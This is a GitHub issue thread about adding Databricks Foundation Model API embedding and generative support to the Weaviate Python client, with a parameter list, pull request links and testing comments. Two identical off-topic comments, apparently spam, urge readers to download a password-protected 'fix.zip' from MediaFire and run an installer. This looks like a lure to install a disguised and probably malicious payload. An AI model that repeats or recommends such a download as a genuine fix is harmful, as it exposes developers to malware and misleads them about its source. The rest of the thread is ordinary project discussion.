### ISSUE TITLE
Add support for Databricks Foundation Model API - Embedding & generative

### ISSUE THREAD

**Issue by dirkkul** [weaviate/weaviate-python-client#1261]
parameters:

embedding:
only standard
https://github.com/weaviate/weaviate/pull/5508

generative:
	Model            string
	FrequencyPenalty *float64
	Logprobs         *bool
	TopLogprobs      *int
	MaxTokens        *int
	N                *int
	PresencePenalty  *float64
	Stop             []string
	Temperature      *float64
	TopP             *float64

https://github.com/weaviate/weaviate/pull/5536

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tsmith023** [comment]
Hi @hsm207, [here](https://github.com/weaviate/weaviate-python-client/pull/1273) is the PR for `generative-databricks`. Could you test it out and then we'll merge the client change? Cheers 😁

**Comment by hsm207** [comment]
@tsmith023 I've tested both and they work. Thanks!

Is there a timeline for when these updates will be released and is going to be a minor or a patch release?

**Comment by hsm207** [comment]
> Is there a timeline for when these changes will be released and is going to be a minor or a patch release?

@tsmith023 or @dirkkul ☝️
